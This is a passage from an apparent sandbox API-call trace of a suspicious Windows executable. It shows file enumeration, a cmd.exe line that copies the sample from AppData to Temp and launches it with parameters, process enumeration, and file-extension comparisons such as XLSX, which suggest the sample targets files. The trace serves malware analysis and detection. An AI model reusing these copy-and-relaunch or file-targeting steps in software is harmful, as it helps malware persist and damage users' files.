lpFindFileData=0x12f418) returned 1 [0111.216] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.216] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.216] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.216] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.216] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.216] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.216] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.216] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.217] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.217] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.217] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.217] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 0 [0111.217] FindClose (in: hFindFile=0x1c9648 | out: hFindFile=0x1c9648) returned 1 [0111.217] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 0 [0111.217] FindClose (in: hFindFile=0x1c9608 | out: hFindFile=0x1c9608) returned 1 [0111.217] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0111.217] FindClose (in: hFindFile=0x1c95c8 | out: hFindFile=0x1c95c8) returned 1 [0111.222] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x126c85c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0111.222] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x38 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x38 [0111.222] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0111.222] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\", lpszShortPath=0x126c85c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0111.222] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x63 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x63 [0111.222] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0111.222] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" [PARAMS]", cchLength=0xb1 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\BKM66BYK.EXE\" && \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\BKM66BYK.EXE\" [PARAMS]") returned 0xb1 [0111.222] CharUpperBuffW (in: lpsz="[PARAMS]", cchLength=0x8 | out: lpsz="[PARAMS]") returned 0x8 [0111.222] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb2c*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb1c | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"", lpProcessInformation=0x12fb1c*(hProcess=0xf0, hThread=0xf4, dwProcessId=0xd2c, dwThreadId=0xd30)) returned 1 [0111.227] CloseHandle (hObject=0xf0) returned 1 [0111.227] CloseHandle (hObject=0xf4) returned 1 [0111.227] Sleep (dwMilliseconds=0xfa) [0111.505] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xec [0111.510] Process32FirstW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.511] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0111.511] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0111.512] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0111.513] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0111.513] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0111.514] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0111.515] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0111.515] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0111.516] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0111.517] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.517] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.518] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.519] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.519] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.520] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0111.521] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.522] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.523] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0111.525] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.526] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0111.527] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0111.528] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0111.529] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0111.530] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.531] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0111.533] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0111.534] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0111.535] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0111.536] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0111.537] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0111.538] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0111.540] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0111.541] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0111.542] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0111.543] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0111.544] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0111.545] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0111.546] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0111.547] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0111.548] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0111.549] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0111.550] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0111.551] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0111.552] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0111.553] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0111.554] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.555] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0111.557] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0111.558] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0111.560] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xcb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0111.561] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0111.562] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xcc0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0111.563] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0111.565] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xccc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0111.566] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xcec, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0111.567] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0111.568] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0111.569] Process32NextW (in: hSnapshot=0xec, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0111.570] CloseHandle (hObject=0xec) returned 1 [0111.570] CharUpperBuffW (in: lpsz="sdf", cchLength=0x3 | out: lpsz="SDF") returned 0x3 [0111.570] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="SDF", cchCount1=3, lpString2="", cchCount2=0) returned 3 [0111.570] CharUpperBuffW (in: lpsz="sdf", cchLength=0x3 | out: lpsz="SDF") returned 0x3 [0111.570] CharUpperBuffW (in: lpsz="sdf", cchLength=0x3 | out: lpsz="SDF") returned 0x3 [0111.570] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="SDF", cchCount1=3, lpString2="SDF", cchCount2=3) returned 2 [0111.570] CharUpperBuffW (in: lpsz="xlsx", cchLength=0x4 | out: lpsz="XLSX") returned 0x4 [0111.570] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="XLSX", cchCount1=4, lpString2="SDF", cchCount2=3) returned 3 [0111.570] CharUpperBuffW (in: lpsz="xlsx", cchLength=0x4 | out: lpsz="XLSX") returned 0x4 [0111.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SDF", cchCount1=3, lpString2="XLSX", cchCount2=4) returned 1 [0111.570] CharUpperBuffW (in: lpsz="xlsx", cchLength=0x4 | out: lpsz="XLSX") returned 0x4 [0111.570] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="XLSX", cchCount1=4, lpString2="XLSX", cchCount2=4) returned 2 [0111.570] CharUpperBuffW (in: lpsz="xlsx", cchLength=0x4 | out: lpsz="XLSX") returned 0x4 [0111.570] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="XLSX", cchCount1=4, lpString2="XLSX", cchCount2=4) returned 2 [0111.570] CharUpperBuffW (in: lpsz="xlsx", cchLength=0x4 | out: lpsz="XLSX") returned 0x4 [0111.570] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="XLSX", cchCount1=4, lpString2="XLSX", cchCount2=4) returned 2 [0111.571] CharUpperBuffW (in: lpsz="xlsx", cchLength=0x4 | out: lpsz="XLSX") returned 0x4 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="XLSX", cchCount1=4, lpString2="XLSX", cchCount2=4) returned 2 [0111.571] CharUpperBuffW (in: lpsz="xlsx", cchLength=0x4 | out: lpsz="XLSX") returned 0x4 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="XLSX", cchCount1=4, lpString2="XLSX", cchCount2=4) returned 2 [0111.571] CharUpperBuffW (in: 